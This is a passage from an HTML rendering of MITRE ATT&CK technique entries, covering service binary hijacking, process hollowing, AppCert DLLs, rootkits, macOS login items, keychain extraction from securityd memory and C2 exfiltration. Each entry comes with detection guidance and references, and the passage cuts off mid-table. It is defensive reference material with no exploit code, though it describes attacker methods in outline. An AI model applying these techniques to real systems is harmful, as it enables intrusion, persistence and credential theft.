<p>Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.</p>
</div>
<div class="paragraph">
<p>===Executable Installers===</p>
</div>
<div class="paragraph">
<p>Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)</p>
</div>
<div class="paragraph">
<p>Detection: Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.</p>
</div>
<div class="paragraph">
<p>Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Services</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 727. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1044">https://attack.mitre.org/wiki/Technique/T1044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/">https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://seclists.org/fulldisclosure/2015/Dec/34">http://seclists.org/fulldisclosure/2015/Dec/34</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_hollowing_t1093"><a class="anchor" href="#_process_hollowing_t1093"></a><a class="link" href="#_process_hollowing_t1093">Process Hollowing - T1093</a></h3>
<div class="paragraph">
<p>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to Process Injection, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Engame Process Injection July 2017)</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls that unmap process memory, such as ZwUnmapViewOfSection or NtUnmapViewOfSection, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)</p>
</div>
<div class="paragraph">
<p>Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, API monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting, Anti-virus, Whitelisting by file name or path, Signature-based detection</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 728. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1093">https://attack.mitre.org/wiki/Technique/T1093</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.autosectools.com/process-hollowing.pdf">http://www.autosectools.com/process-hollowing.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scripting_t1064"><a class="anchor" href="#_scripting_t1064"></a><a class="link" href="#_scripting_t1064">Scripting - T1064</a></h3>
<div class="paragraph">
<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.</p>
</div>
<div class="paragraph">
<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>
</div>
<div class="paragraph">
<p>Detection: Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</p>
</div>
<div class="paragraph">
<p>Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, File monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 729. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1064">https://attack.mitre.org/wiki/Technique/T1064</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.metasploit.com">http://www.metasploit.com</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.veil-framework.com/framework/">https://www.veil-framework.com/framework/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/">https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_applescript_t1155"><a class="anchor" href="#_applescript_t1155"></a><a class="link" href="#_applescript_t1155">AppleScript - T1155</a></h3>
<div class="paragraph">
<p>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the &lt;code&gt;osalang&lt;/code&gt; program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they&#8217;re already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command lie via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, System calls, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 730. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1155">https://attack.mitre.org/wiki/Technique/T1155</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/">https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_from_removable_media_t1025"><a class="anchor" href="#_data_from_removable_media_t1025"></a><a class="link" href="#_data_from_removable_media_t1025">Data from Removable Media - T1025</a></h3>
<div class="paragraph">
<p>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration.</p>
</div>
<div class="paragraph">
<p>Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system&#8217;s connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>System Requirements: Privileges to access removable media drive and files</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 731. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1025">https://attack.mitre.org/wiki/Technique/T1025</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_code_signing_t1116"><a class="anchor" href="#_code_signing_t1116"></a><a class="link" href="#_code_signing_t1116">Code Signing - T1116</a></h3>
<div class="paragraph">
<p>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)</p>
</div>
<div class="paragraph">
<p>Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)</p>
</div>
<div class="paragraph">
<p>Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</p>
</div>
<div class="paragraph">
<p>Detection: Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Windows User Account Control</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 732. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1116">https://attack.mitre.org/wiki/Technique/T1116</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Code%20signing">https://en.wikipedia.org/wiki/Code%20signing</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thesafemac.com/new-signed-malware-called-janicab/">http://www.thesafemac.com/new-signed-malware-called-janicab/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/">https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates">http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_appcert_dlls_t1182"><a class="anchor" href="#_appcert_dlls_t1182"></a><a class="link" href="#_appcert_dlls_t1182">AppCert DLLs - T1182</a></h3>
<div class="paragraph">
<p>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions: (Citation: Engame Process Injection July 2017)
*CreateProcess
*CreateProcessAsUser
*CreateProcessWithLoginW
*CreateProcessWithTokenW
*WinExec
Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Engame Process Injection July 2017)</p>
</div>
<div class="paragraph">
<p>Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)</p>
</div>
<div class="paragraph">
<p>Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, Process Monitoring, Windows Registry</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 733. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1182">https://attack.mitre.org/wiki/Technique/T1182</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://forum.sysinternals.com/appcertdlls%20topic12546.html">https://forum.sysinternals.com/appcertdlls%20topic12546.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rootkit_t1014"><a class="anchor" href="#_rootkit_t1014"></a><a class="link" href="#_rootkit_t1014">Rootkit - T1014</a></h3>
<div class="paragraph">
<p>Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware. (Citation: Wikipedia Rootkit)</p>
</div>
<div class="paragraph">
<p>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</p>
</div>
<div class="paragraph">
<p>Detection: Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: BIOS, MBR, System calls</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems, Process whitelisting, Signature-based detection, System access controls, Whitelisting by file name or path</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM, root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 734. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1014">https://attack.mitre.org/wiki/Technique/T1014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Rootkit">https://en.wikipedia.org/wiki/Rootkit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf">https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/">https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf">http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_login_item_t1162"><a class="anchor" href="#_login_item_t1162"></a><a class="link" href="#_login_item_t1162">Login Item - T1162</a></h3>
<div class="paragraph">
<p>MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user&#8217;s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user&#8217;s &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt; (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they dont all have to since there is an option to Hide the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware).</p>
</div>
<div class="paragraph">
<p>Detection: All the login items are viewable by going to the Apple menu &#8594; System Preferences &#8594; Users &amp; Groups &#8594; Login items. This area should be monitored and whitelisted for known good applications. Monitor process execution resulting from login actions for unusual or unknown applications.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 735. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1162">https://attack.mitre.org/wiki/Technique/T1162</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/">https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_command_line_interface_t1059"><a class="anchor" href="#_command_line_interface_t1059"></a><a class="link" href="#_command_line_interface_t1059">Command-Line Interface - T1059</a></h3>
<div class="paragraph">
<p>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task).</p>
</div>
<div class="paragraph">
<p>Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</p>
</div>
<div class="paragraph">
<p>Detection: Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM, User</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 736. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1059">https://attack.mitre.org/wiki/Technique/T1059</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Command-line%20interface">https://en.wikipedia.org/wiki/Command-line%20interface</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_exfiltration_over_command_and_control_channel_t1041">Exfiltration Over Command and Control Channel - T1041</a></h3>
<div class="paragraph">
<p>Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</p>
</div>
<div class="paragraph">
<p>Detection: Detection for command and control applies. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 737. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1041">https://attack.mitre.org/wiki/Technique/T1041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_multi_stage_channels_t1104"><a class="anchor" href="#_multi_stage_channels_t1104"></a><a class="link" href="#_multi_stage_channels_t1104">Multi-Stage Channels - T1104</a></h3>
<div class="paragraph">
<p>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.</p>
</div>
<div class="paragraph">
<p>Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.</p>
</div>
<div class="paragraph">
<p>The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.</p>
</div>
<div class="paragraph">
<p>Detection: Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Network device logs, Network protocol analysis, Packet capture, Process use of network</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 738. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1104">https://attack.mitre.org/wiki/Technique/T1104</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_securityd_memory_t1167"><a class="anchor" href="#_securityd_memory_t1167"></a><a class="link" href="#_securityd_memory_t1167">Securityd Memory - T1167</a></h3>
<div class="paragraph">
<p>In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apples keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apples securityd utility takes the users logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the users password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)</p>
</div>
<div class="paragraph">
<p>If an adversary can obtain root access (allowing them to read securityds memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the users logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 739. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1167">https://attack.mitre.org/wiki/Technique/T1167</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain">http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain</a></p></td>
</tr>
<tr>
